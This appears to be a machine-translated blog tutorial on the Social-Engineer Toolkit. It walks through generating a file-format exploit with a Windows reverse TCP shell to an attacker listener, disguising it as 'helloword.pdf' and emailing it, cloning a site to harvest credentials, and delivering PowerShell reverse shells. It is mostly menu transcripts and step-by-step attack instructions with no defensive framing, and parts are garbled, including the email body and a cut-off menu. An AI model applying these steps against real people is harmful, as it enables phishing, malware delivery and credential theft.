SET's social engineering attack method

SET(Social-Engineer Toolkit)

Open source social engineering utilization kit, usually combined with metasploit to use

Github: https://github.com/trustedsec/ptf to update all your tools

Enter kali input

setoolkit

We select the first item from the main menu just now and enter the social engineering Attack

1. Sperar-Phishing Attack

We choose the No. 1 attack, which is a phishing attack

set> 1

The Spearphishing module allows you to specially craft email messages and send
 them to a large (or small) number of people with attached fileformat malicious
 payloads. If you want to spoof your email address, be sure "Sendmail" is in-
 stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
 flag to SENDMAIL=ON.

 There are two options, one is getting your feet wet and letting SET do
 everything for you (option 1), the second is to create your own FileFormat
 payload and use it in your own attack. Either way, good luck and enjoy!

   1) Perform a Mass Email Attack
   2) Create a FileFormat Payload
   3) Create a Social-Engineering Template

  99) Return to Main Menu

set:phishing>

You can see that there are three options

1) Perform a Mass Email Attack                        mass-mailing attacks
2) Create a FileFormat Payload                         create a file format payload
3) Create a Social-Engineering Template         to create a template of social engineering

We then choose the second option

set:phishing>2
/usr/share/metasploit-framework/

 Select the file format exploit you want.
 The default is the PDF embedded EXE.

           ********** PAYLOADS **********

   1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
   2) SET Custom Written Document UNC LM SMB Capture Attack
   3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
   4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
   5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
   7) Adobe Flash Player "Button" Remote Code Execution
   8) Adobe CoolType SING Table "uniqueName" Overflow
   9) Adobe Flash Player "newfunction" Invalid Pointer Use
  10) Adobe Collab.collectEmailInfo Buffer Overflow
  11) Adobe Collab.getIcon Buffer Overflow
  12) Adobe JBIG2Decode Memory Corruption Exploit
  13) Adobe PDF Embedded EXE Social Engineering
  14) Adobe util.printf() Buffer Overflow
  15) Custom EXE to VBA (sent via RAR) (RAR required)
  16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  17) Adobe PDF Embedded EXE Social Engineering (NOJS)
  18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  19) Apple QuickTime PICT PnSize Buffer Overflow
  20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  21) Adobe Reader u3D Memory Corruption Vulnerability
  22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads>

The above means:

Choose the file format vulnerability you want.
The default is PDF embedded EXE.
********** Payload **********
Set custom-written DLL hijacking attack vector (RAR, ZIP)
2) Set custom-written document UNC LM SMB capture attack
3) MS15-100 Microsoft Windows Media Center MCL vulnerability
4) MS14-017 Microsoft Word RTF object confusion (2014-04-01)
5) Microsoft Windows CreateSizedDIBSECTION stack buffer overflow
Microsoft Word RTF pFragments stack buffer overflow vulnerability (MS10-087)
7 ) Adobe Flash Player "button" remote code execution
8) Adobe CoolType

We choose the third payload, which will let you choose the connection method

set:payloads>3



   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

Here we choose the 4th windows 64-bit tcp bounce connection

set:payloads>4
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.200.41]:
set:payloads> Port to connect back on [443]:

[-] Defaulting to port 443...
[*] All good! The directories were created.
[-] Generating fileformat exploit...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...

Next, you will be asked to enter the listening address, usually we should enter the public network IP, so that we can monitor the external network, but here is the simulated ip instead of kali.

 

After waiting for a while, our payload is ready. There are two options. The first is to keep the current name, and the second is to rename.

We choose the second

set:phishing>2
set:phishing> New filename:helloword.pdf

Next, there are two options, let us choose whether to send an email or group emails, here we choose the first option

set:phishing>1

There are two options here: 1. Pre-defined templates 2. One-time use email templates

We choose the 2nd

set:phishing>2   
set:phishing> Subject of the email:
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:

Then let us type the content of the email, whether it is html or plain text, we choose p, and then enter a piece of content

set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:
Next line of the body: 君不见黄河之水天上来，奔流到海不复回。
君不见高堂明镜悲白发，朝如青丝暮成雪。
人生得意须尽欢，莫使金樽空对月。
天生我材必有用，千金散尽还复来。
烹羊宰牛且为乐，会须䷎ext line of the body: 饮三百Next line of the body: Next line of the body: Next line of the body: 杯。
岑夫子，丹丘生，将进酒，杯莫停。
与君歌一曲，请君为我倾耳听。(倾耳听 一作：侧耳听)
钟鼓馔玉不足贵，但愿长醉不愿醒。(不足贵 一作：何足贵；不愿醒 一作：不复醒)
古来圣Next line of the body: 贤皆宎ext line of the body: Next line of the body: Next line of the body: 寞，惟有饮者留其名。(古来 一作：自古；惟 通：唯)
陈王昔时宴平乐，斗酒十千恣欢谑。
主人何为言少钱，径须沽取对君酌。
五花马、千金裘，呼儿将出换美酒，与尔同销万古愁。
Next line of the body: Next line of the body: Next line of the body: Next line of the body:

Press ctrl+c to end, and then enter the email address to send

set:phishing> Send email to:[email protected]

Next, let's set up the account for sending the email. The first item is gmail, the second item is to choose your own other mailbox, but the second item needs to be configured with smtp

set:phishing>1                                        
set:phishing> Your gmail email address:[email protected]
set:phishing> The FROM NAME user will see:

There is nothing to say next, just follow the prompts.

2. Website Attrack

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) HTA Attack Method

We choose the first

set:webattack>1

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

We choose the second one, then let us enter the ip address

set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.200.41]: 

Then let us use which way to do

1. Make my own self-signed certificate applet.
2. Use the applet built in SET.
3. I have my own code signing certificate or applet

We choose 2, and then let us choose the cloned URL

set:webattack> Enter the url to clone:

After entering the URL, let us choose the shell's interactive mode

Then we choose the first

then

Sometimes it will be unsuccessful, this is because there are restrictions: the other party’s system runs the java browser program

 

Next, we will engage in an authentication collection attack

We choose 3

Choice 2

Then we can receive any data the user enters on the phishing page

Let's do another multiple attack method

The so-called multiple attack means that you can choose a variety of attack methods.

From the website attack directory, press 6 to enter the multi-attack, enter some parameters and enter this

In fact, it's just a lot of work together, so I won't demonstrate it here.

 

3. Wireless Access Point Attack

1. Need a wireless network card

2. The virtual machine needs USB wireless network card support

3. Need to turn on dns hijacking

4. QRCode Generator Attack

The QR code attack provides the function of generating a QR code based on the URL, and the connection content needs to be constructed by yourself

 

5.Powershell Attack (Powershell Attack)

Utilize the power shell function of windows system

The lower version of the Windows operating system cannot run powershell

Go here for the basics of powershell

https://mp.weixin.qq.com/s/LR6OL_mARk6YBHcZAbKY3Q

 

We select item 9, enter the monitoring IP address, and port number, then generate powershell, send powershell to the monitored host, select yes to start monitoring

Run ps1 type files on the target host

The kali monitoring page bounced out of the shell

 

Several other attacks will not be demonstrated here, if you are interested, you can try it yourself